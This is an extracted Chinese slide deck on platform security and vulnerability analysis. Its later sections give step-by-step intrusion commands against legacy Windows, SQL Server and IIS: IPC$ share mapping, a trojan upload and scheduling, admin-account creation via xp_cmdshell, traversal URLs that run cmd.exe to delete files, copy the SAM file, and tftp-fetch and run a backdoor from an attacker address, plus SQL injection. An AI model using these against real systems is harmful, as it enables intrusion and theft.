操作平台安全体系及漏洞分析0331_第1页
操作平台安全体系及漏洞分析0331_第2页
操作平台安全体系及漏洞分析0331_第3页
操作平台安全体系及漏洞分析0331_第4页
操作平台安全体系及漏洞分析0331_第5页
已阅读5页,还剩46页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、操作平台安全体系及漏洞分析,张贺勋,蓝盾安全小组,一、安全体系 操作平台的安全体系包括:操作系统的安全、应用平台的安全和应用系统的安全。常见的操作平台有WINDOWS2000、LINUX、UNIX、SOLARS、ATX、HP等。它是网络安全中最基本的元素。,蓝盾安全小组,1、操作系统的安全 操作系统安全指保证客户资料、操作系统访问控制的安全,同时能够对该操作系统上的应用进行审计。 2、应用平台的安全 应用平台指建立在网络系统之上的应用软件服务,如数据库服务器、电子邮件服务器、Web服务器等,由于应用平台的系统非常复杂,通常采用多种技术(如SSL等)来增强应用平台的安全性。 3、应用系统的安全

2、应用系统完成网络系统的最终目的-为用户服务。应用系统的安全与系统设计和实现关系密切。应用系统通过应用平台提供的安全服务来保证基本安全,如通信内容安全、通信双方的认证、审计等。,二、漏洞分析,1、漏洞的形成原因 大型软件、系统的编写,是许多程序员共同完成。他们是将一个软件或系统分成若干板块,分工编写,然后再汇总,测试。最后,修补,发布。在软件汇总时,为了测试方便,程序员总会留有后门;在测试以后再进行修补这些后门,如果一旦疏忽(或是为某种目的故意留下),或是没有发现,软件发布后自然而然就成了漏洞。 还值得一提的就是若干板块之间的空隙,这里很容易出现连程序员的都没想到的漏洞!,蓝盾安全小组,还有,“

3、几不管”地带,也正是漏洞的温床!如果,在软件发布前没能及时发现,就为黑客提供了便利。 漏洞的另一形成温床就是网络协议!网络协议有TCP、UDP、ICMP、IGMP等。其实,他们本来的用途是好的,但却被别人用于不乏的活动:例如,ICMP本来是用于寻找网络相关信息,后来却被用于网络嗅探和攻击;TCP本来是用于网络传输,后来却被用于泄漏用户信息,2、操作系统的漏洞 NT弱口令 弱口令就是用户的操作密码过于简单(如123)。 描述:本漏洞的危害性极强,它可以对系统服务器作任何的操作。主要是因为管理员的安全意识不足。测试目的:用本漏洞控制服务器系统。 (1)我们可以用爆力破解工具或扫描器(XSCAN等)

4、对机器进行扫描,可得到管理员密码。只要拥有管理员级权限,就能完全共享应用对方的机器,如下面的命令会将对方的C盘映射为自己的X盘:c:net use x: 目标主机的IP地址c$ 密码 /user:用户名其中c$为系统默认共享,依此类推,同样可以共享对方的d$,e$,(2)运行AT命令 。 C:net start scheduleSchedule 正在启动服务. Schedulw 服务启动成功。AT的语法:AT computername time command比如:AT computername time runnc.bat (3)用远程控制终端,输入法漏洞 描述:输入法漏洞可以说是中文Win

5、dows2000推出后的第一个致命漏洞,通过它我们可以做许多的事情,包括建立用户. 测试1:使用文件类型编辑创建管理员用户: 1.开机到登陆界面调出输入法,如全拼-帮助-操作指南,跳出输入法指南帮助文件 2.右击选项按钮,选择跳至url 3.在跳至URL上添上c:,其它的也可. 4.帮助的右边会进入c: 5.按帮助上的选项按钮. 6.选internet选项.会启动文件类型编辑框.,7.新建一个文件类型,如一个you文件类型,在跳出的文件后缀中添上you.确定. 8.选中文件类型框中的you文件类型,点击下面的高级按钮,会出现文件操作对话框. 9.新建一种文件操作,操作名任意写,如ppp 10.

6、该操作执行的命令如下: C:WINNTsystem32cmd.exe/cnetusermayi123456/add 看看目标计算机上有那些共享的资源可以用下面命令: c:net view 目标计算机的IP地址 一旦IPC$共享顺利完成,下一个命令是: c:net use g: xxx.xxx.xxx.xxxc$ 得到了C$共享,并将该目录映射到g:,键入: c:dir g: /p 就能显示这个目录的所有内容。,测试 2:通过测试1来上传木马控制服务器 c:net use ipc$ ” /user:”admin” 此时,cmd会提示命令成功完成。这样你就和建立

7、了IPC连接。 c:copy server.exe admin$ 上传server.exe到的winnt目录,因为winnt目录里的东西比较多,管理员不容易发现,所以我们把server.exe上传到里面。Server.exe是janker写的winshell生成的程序,WinShell是一个运行在Windows平台上的Telnet服务器软件。 c:net time 这个命令可以的到的系统时间,例如是00:00 c:at 00:01 ”server.exe”,cmd会提示新加了一项任务,其作业ID为1,

8、这样远程系统会在00:01时运行server.exe。 c:at 1 这样可以查看ID为1的作业情况。 c:net use ipc$ /delete 退出IPC连接。 现在,server.exe已经在远程主机上运行了。输入: c:telnet 21(端口可以自己在winshell中设定) 这样就成功的telnet到上了。,3、应用平台的漏洞 SQL SERVER存在的一些安全漏洞: “SA”帐号弱口令 描述:危害性极强,它可以完作控制系统服务器。存在“sa”帐户,密码就为空, 或密码过于简单,我们就可以通过扫描工具(如

9、X-SCAN等)得到密码,用测试:通过XP-CMDSHEll来增加一个帐号 如:Xp_cmdshell net user testuser /ADD 然后在: Xp_cmdshell net localgroup Administrators testuser /ADD 这样攻击者就成功的在SQL SERVER上增加了一个用户。,当然远程的话,一般需要有1433口开着,通过MSSQL 客户端进行连接。 最后你可以用添加的用户名通过远程控制终端来控制你服务器系统。,扩展存储过程参数解析漏洞: 描述:危害性极强,它可以完作控制系统服务器。起主要问题是在MSD中提供一个API函数srv_parami

10、nfo(),它是用来扩展存储过程调用时解释深入参数的,如: exec , , . 如要查询“c:winnt”的目录树,可以如下表达: exec xp_dirtree c:winnt 但没有检查各个参数的长度,传递相当长的字符串,就存在了覆盖其他堆栈参数的可能导致缓冲溢出。 目前已知受影响的扩展存储过程如下: xp_printstatements (xprepl.dll) xp_proxiedmetadata (xprepl.dll) xp_SetSQLSecurity (xpstar.dll) ,关于openrowset和opendatasource 描述:危害性极强,它可以完作控制系统服务器

11、。利用openrowset发送本地命令,通常我们的用法是(包括MSDN的列子)如下 select*fromopenrowset(sqloledb,myserver;sa;,select*fromtable) 可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问,它必须跟在select后面,也就是说需要返回一个recordset 那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的! select*fromopenrowset(sqloledb,server;sa;,setfmtonlyoffexecmaster.dbo.xp_cmdshelldirc:) 必

12、须加上setfmtonlyoff用来屏蔽默认的只返回列信息的设置,这样xp_cmdshell返回的output集合就会提交给前面,的select显示,如果采用 默认设置,会返回空集合导致select出错,命令也就无法执行了。 那么如果我们要调用sp_addlogin呢,他不会像xp_cmdshell返回任何集合的,我们就不能再依靠fmtonly设置了,可以如下操作 select*fromopenrowset(sqloledb,server;sa;,selectOK!execmaster.dbo.sp_addloginHectic) 这样,命令至少会返回selectOK!的集合,你的机器商会显示

13、OK!,同时对方的数据库内也会增加一个Hectic的账号,也就是说,我们利用 selectOK!的返回集合欺骗了本地的select请求,是命令能够正常执行,通理sp_addsrvrolemember和opendatasource也可以如此操作!,IIS漏洞 IIS unicode漏洞 描述:危害性极强,可以完全的控制服务器。对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如“%c1%hh”或者“%c0%hh”,它会首先将其解码变成:0 xc10 xhh,然后尝试打开这个文件,Windows 系统认为0 xc10 xhh可能是unicode编码,因此它会首

14、先将其解码,如果 0 x00 (0 xc1 - 0 xc0) * 0 x40 + 0 xhh %c0%hh - (0 xc0 - 0 xc0) * 0 x40 + 0 xhh 例如,在Windows 2000 简体中文版 + IIS 5.0 + SP1系统下测试:,http:/target/A.ida/%c1%00.ida IIS会报告说 .ida 文件找不到 这里: (0 xc1-0 xc0)*0 x40+0 x00=0 x40= http:/target/A.ida/%c1%01.ida IIS会报告说 A.ida 文件找不到 这里: (0 xc1-0 xc0)*0 x40+0 x01=0

15、 x41=A 攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。 测试 1:下面的URL可能列出当前目录的内容: 测试2 :利用这个漏洞查看系统文件内容也是可能的: ,测试 3: 删除空的文件夹命令: http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+rd+c:snowspider 测试 4:删除文件的命令: http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+del+c:autoexec.bak测试 5: Copy文件 http:/xxx.xxx

16、.xxx.xxx/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+copy%20c:winntrepairsam._%20c: inetpubwwwroot 测试 5: 用木马(用TFTP、NCX99) 在地址栏里填入:,/scripts/.%c1%1c./winnt/system32/cmd.exe?/c+tftp -i ?.?.?.? GET ncx99.exe c:inetpubscriptssr.exe ?.?.?.?为你自己的IP,注意:c:inetpubscriptssr.exe 其中c:inetpubsc

17、ripts为主机服务器目录,要看主机的具体情况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。 然后等待.大概3分钟.IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:inetpubscripts目录了,您可以自己检查一下。 再使用如下调用来执行ncx99.exe(sr.exe) /scripts/.%c1%1c./winnt/system32/cmd.exe?/c+c:inetpubscriptssr.exe 然后您就可以 telnet 99,Microsoft IIS CGI文件

18、名错误解码漏洞 描述:危害性强,可以查看服务器上的文件和信息。 IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为“.exe”或“.com”等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对“./”或“./”的检查,在某些条件下,攻击者可以执行任意系统命令。,例如,对于

19、这个字符,正常编码后是%5c。这三个字符对应的编码为: % = %25 5 = %35 c = %63 如果要对这三个字符再做一次编码,就可以有多种形式,例如: %255c %35c %35%63 %25%35%63 . 因此,“.”就可以表示成“.%255c”或“.%35c”等等形式。 测试:例如,如果TARGET存在一个虚拟可执行目录(scripts),并且它与windows系统在同一驱动器上。那么提交类似下列请求:,http:/TARGET/scripts/.%255c.%255cwinnt/system32/cmd.exe?/c+dir+c: 就会列出C:的根目录。 当然,对于/或者.

20、做变换同样可以达到上面的效果。 例如:.%252f, .%252e/. 注意:攻击者只能以IUSER_machinename用户的权限执行命令。,printer远程缓存溢出漏洞 缓存溢出:缓存溢出又称为缓冲溢出,缓冲区指一个程序的记忆范围(领域),该领域是用来储存一些数据,如电脑程序信息,中间计算结果,或者输入参数。把数据调入缓冲区之前,程序应该验证缓冲区有足够的长度以容纳所有这些调入的数据。否则,数据将溢出缓冲区并覆写在邻近的数据上,当它运行时,就如同改写了程序。 假如溢出的数据是随意的,那它就不是有效的程序代码,当它试图执行这些随意数据时,程序就会失败。另一方面,假如数据是有效的程序代码,

21、程序将会按照数据提供者所设定的要求执行代码和新的功能。,描述:漏洞的活动范围是:这是一个缓存溢出漏洞,这漏洞比以往的普通溢出存在更大的危害,主要有两方面的原因: *在缺省安全的情况下,该漏洞可以被来自网络的利用。 *可以完全获得和控制存在该漏洞的网站服务器。 一旦溢出成功,他可以做他想做的一些事情,包括:安装和运行程序,重新配置服务,增加、改变或者删除文件和网页的内容等等。 漏洞的起因是:WIN2K在网络打印ISAPI扩展上缺少足够的缓冲区检查,当一个发出特殊的请求服务时产生缓存溢出,可以让在本地系统执行任意代码。 测试:通过IIS5HACK工具来检用信息,iis5hack someip 80

22、 3 iis5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p connecting. sending. Now you can telnet to 99 port good luck :) c:telnet 6 99 Microsoft Windows 2000 Version 5.00.2195 (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32 已经进入目标主机

23、,你想干什么就是你的事啦。,IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞 描述:危害性极强,它可以完作控制系统服务器。微软IIS缺省安装情况下带了一个索引服务器(Index Server,在Windows 2000下名为Index Service).缺省安装时,IIS支持两种脚本映射:管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区,如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发

24、送数据,攻击者可以改变程序执行流程,执行任意代码。 成功地利用这个漏洞,攻击者可以远程获取Local System权限。,测试:来控制服务器。运行IDQGUI程序,出现一个窗口,填好要入侵的主机IP,选取所对应的系统SP补丁栏,其他设置不改,取默认。然后按右下角的IDQ益出键。 如果成功 如图 如果不成功会提示连接错误。,连接成功后,我们打开WIN下的DOS状态,输入:NC -VV X.X.X.X 813 如果成功 如图 不成功的话可以在IDQGUI程序里换另一个SP补丁栏试试,如果都不行,就放弃。换其他漏洞机器。,4、应用系统漏洞 编程语言漏洞 MDB数据库可下载漏洞 描述:危害性强,可以得

25、到网站的所有内容。数据库中一般存放的是客户的帐号、密码以及网站的中所有内容,如果得到了数据库,也就可以说得到了网站的一功, 原理,WEB服务器遇到不能解释的文件是就给下载, 测试:在地址栏输入http:/someurl/path/name.mdb,你会发现name.mdb的数据库给下载下来。,SQL语句漏洞 描述:危害性强,可以进入网站的后台应用程序。假设没有过滤必要的字符: select*fromloginwhereuser=$HTTP_POST_VARSuserandpass=$HTTP_POST_VARSpass 我们就可以在用户框和密码框输入1or1=1通过验证了。这是非常古董的方法了

26、,这个语句会替换成这样:select*fromloginwhereuser=1or1=1andpass=1or1=1 因为or1=1成立,所以通过了。解决的办法最好就是过滤所有不必要的字符,,Jsp代码泄漏漏洞 描述:危害性强,有可能可以查看到数据库帐号密码。 在访问JSP页面时,如果在请求URL的.jsp后缀后面加上一或多个.、%2E、+、%2B、%5C、%20、%00 ,会泄露JSP源代码。测试 :查看网页源代码 http:/localhost:8080/index.jsp 服务器会正常解释。 http:/localhost:8080/index.jsp. 只要在后面加上一个.就会导致源代

27、码泄漏(可以通过浏览器的查看源代码看到)。 原因: 由于Windows在处理文件名时,将index.jsp和index.jsp.认为是同一个文件。,CGI漏洞 x.htw or qfullhit.htw or iirturnh.htw描述:危害性强,IIS4.0上有一个应用程序映射htw-webhits.dll,这是用于Index Server的点击功能的。尽管你不运行Index Server,该映射仍然有效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文件,数据库文件,和ASP源代码。 一个攻击者可以使用如下的方法来访问系统中文件的内容:,就会在有此漏洞系统中win.ini文件的内容

28、。 webhits.dll后接上./便可以访问到Web虚拟目录外的文件,下面我们来看个例子:http:/somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/././winnt/system32/logfiles/w3svc1/ex000121.log 3.D.o.s攻击,global.asa+.htr描述:本漏洞的危害性强,通过浏览器请求global.asa+.htr将暴露global.asa的内容,大家都知道global.asa中保存的有数据库的访问用户名和密码的.方法:http:/target/global.asa+.h

29、tr 对于.ASP+.htr文件,ISM.DLL会删除其中的大部分内容,但是仍然可能泄漏一些敏感信息,例如包含文件(通常是.inc文件)的名字和路径等等。而对于global.asa文件,通常会将其全部内容显示出来,如果这个文件中包含一些重要敏感信息,例如SQL server数据库的用户名和密码,可能使攻击者更加容易地入侵或者攻击系统。,查看ASP文件源程序和下载整个网站 描述:本漏洞的危害性强,随IIS和Frontpage Extention server而来的动态库程序,存在后门,允许用户远程读取asp、asa和CGI程序的源代码。但这个动态库要求有密码,这个后门的密码是: Netscape

30、 engineers are weenies! 程序路径为: /_vti_bin/_vti_aut/dvwssr.dll 一般安装了 Frontpage98的 IIS服务器都有这个路径和文件。dvwssr.dll 允许远程使IIS停止响应,可以很容易向这个DLL CGI发送长缓冲器,这个缓冲器溢出能用于在远程服务器上执行任意代码。这个程序要求解码后才能发挥读取asp等源程序,有趣的是,这个密码正是嘲弄其竞争对手Netscape的。,no-such-file.pl 描述:本漏洞的危害性强,这个漏洞会暴露其服务器上的路径,当你访问这个页面时会显示类似以下信息: CGIError Thespecif

31、iedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare: CantopenperlscriptC:InetPubscriptsno-such-file.pl:Nosuchfileor Directory 从此我们可以知道这个页面的物理路径为C:InetPubscriptsno-such-file.pl 测试方法: 访问,Dotdotdot 描述:本漏洞的危害性强,可查看文件内容和目录。 WINDOW中允许连续的点被解释为级连的目录如cd.,解释为cd.而IIS允许远程攻击者绕过WEB安全系统横贯到其他目录。 测试:查看文件内容和列出目录文件 读取 CONFIG.SYS(在根目录下) 列出根目录。,search97.vts 描述:本漏洞的危害性强,这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。 测试:查看文件内容 ?HLNavigate=On&querytext=dcm &ServerKey=Primary &ResultTemplate=./././././././WINNT/SYSTEM.INI &Result

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论